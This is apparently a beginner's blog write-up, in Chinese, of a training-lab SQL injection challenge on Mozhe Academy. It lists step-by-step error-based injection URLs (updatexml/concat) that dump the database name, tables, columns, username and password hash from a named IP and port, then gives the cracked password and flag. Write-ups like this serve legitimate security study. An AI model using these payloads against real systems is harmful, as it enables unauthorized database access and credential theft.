SQL注入漏洞测试(报错盲注)笔记
这个是今天拿下的靶场,这是我作为小白学习的第二个靶场,做一下笔记
已知IP地址为:219.153.49.228,端口号为41280,访问了之后是下面的页面
看到这个页面之后,我进入了后台,查看之后知道了加new_list.php?id=1进行测试看是否有注入点
输入之后页面显示如下
接下来我输入’显示说明存在注入点
所以可以开始进行爆库了,输入http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1) --+
得到数据库名为stormgroup,如下图所示
接下来是爆表,http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%20%27stormgroup%27%20limit%200,1),0x7e),1)–+,0x7e),1) --+
得到的表名是member
接下来是爆字段名,http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%20=%20%27stormgroup%27%20and%20table_name%20=%20%27member%27),0x7e),1) --+
得到name,password,status
猜测用户名是mozhe,为了准确还是爆一下用户名http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20name%20from%20member%20limit%200,1),0x7e),1) --+
实践证明得到的答案确实是mozhe
越来越激动了,快要接近爆密码了,http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20password%20from%20member%20limit%201,1),0x7e),1) --+
看到密码爆出来了,很激动,马上进行解密,发现解密不了,有点小失望
想到了之前爆密码爆出两个,所以猜测正确密码是另外一个
http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20substr(password,32,1)%20from%20member%20limit%201,1),0x7e),1) --+
看到这个傻了,怎么可能,密码不可能才一个字母,看到一个密码那么长,一个那么短,我试着把两个结合一起189c53065f5e0c4101eb8334a3d0653d,最后成功解密出来了,解密结果152794
密码得到之后,马上登陆,蹬蹬蹬~~~密码正确,得到的key为mozhe38886a303969ad3321dbd516a22
SQL注入漏洞测试(报错盲注)笔记相关推荐
- 墨者学院-SQL注入漏洞测试(布尔盲注)
决心按部就班.由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路.本题靶场环境比较简单.也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目.废话 ...
- 【SQL注入漏洞-04】布尔盲注靶场实战
布尔盲注 当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔的盲注. 布尔盲注原理: 利用页面返回的布尔 ...
- 墨者学院-SQL注入漏洞测试(报错盲注)
继续攻克SQL注入类题目啦!!!今天的题目环境提示比较明显,也是比较常见的一种SQL注入漏洞类型,继续储备知识,撸起袖子加油干!!! 附上题目链接:https://www.mozhe.cn/bug/d ...
- B站小迪安全笔记第十六天-SQL注入之查询方式及报错盲注
前言: 当进行 SQL 注入时,有很多注入会出现无回显的情况,其中不回显 的原因可能是 SQL 语句查询方式的问题导致,这个时候我们需要用到相 关的报错或盲注进行后续操作,同时作为手工注入时,同时作为 ...
- SQL报错盲注绕过云锁
SQL报错盲注绕过云锁 有锁 还是被拦截了,怎么办? 我们要知道对方负责检测我们的语句是否存在恶意代码,对方是装了一个工具,但是工具运行要占用系统内存,对于这种防护类软件占用系统资源还是比较高的,而对 ...
- sql注入 1-1_基于报错的注入
sql注入 1-1_ 基于报错注入 1.判断是否存在报错注入 通过 id =1 可以看到服务器返回正常页面 通过 id=1 and 1=1 通过 id=1 and 1=2 服务器也返回正常 通过 id ...
- SQL注入漏洞测试(参数加密)
SQL注入漏洞测试(参数加密) <此WEB业务环境对参数进行了AES加密,为了防止参数产生SQL注入,也是防止SQL注入产生的一种方法,但是这种方式就安全了么?1.掌握信息泄露的方式:2.了解A ...
- SQL注入之floor报错注入
SQL注入之floor报错注入 原理 一.count()函数.group by 二.floor()函数 三.rand()函数 四.报错初体验 五.报错注入 1.获取当前数据库 2.获取当前用户 六.靶 ...
- 渗透测试——sql注入进阶/基于时间的盲注/一看就会/
目录 一.注入点判断 注入类型 SQL注入的类型 二.基于时间的时间盲注 什么是时间盲注 sleep()函数 常用函数 三.bWAPP基于时间的盲注实战 一.注入点判断 1.输入一个单引号',因为语句 ...
最新文章
- 编译安装pdo mysql_centos 6.5下编译安装php5.6,pdo_mysql问题。
- linux获取cpu核数(线程数)
- 十大经典排序算法之快速排序及其优化
- 见证开户_见证中的发现
- CSS选择器学习笔记
- 部署mysql MHA集群
- linux oops产生原理,kernel panic , Oops 等cpu异常的分析与定位
- 一些JavaScript题目
- matlab中求解非线性方程组的函数,利用solve函数求解非线性方程组的问题
- php和tp中生成二维码电子名片
- python安装chardet_Python使用chardet判断字符编码
- 耦合矩阵 matlab,耦合矩阵变换(化简)的问题
- 易班登陆接口接入实例
- 从气电到光伏 新加坡如何走好清洁能源之路?
- Gradle 2.0 用户指南翻译——第五十四章. 构建本机二进制文件
- bp神经网络预测python人口预测_BP神经网络人口预测程序(matlab实现)
- speedoffice表格如何全选表格
- ubuntu 16.04 安装nvidia驱动 下载nvidia官方驱动
- DM8更换产品授权,更换KEY
- 编译原理(1)词法分析程序(C++实现)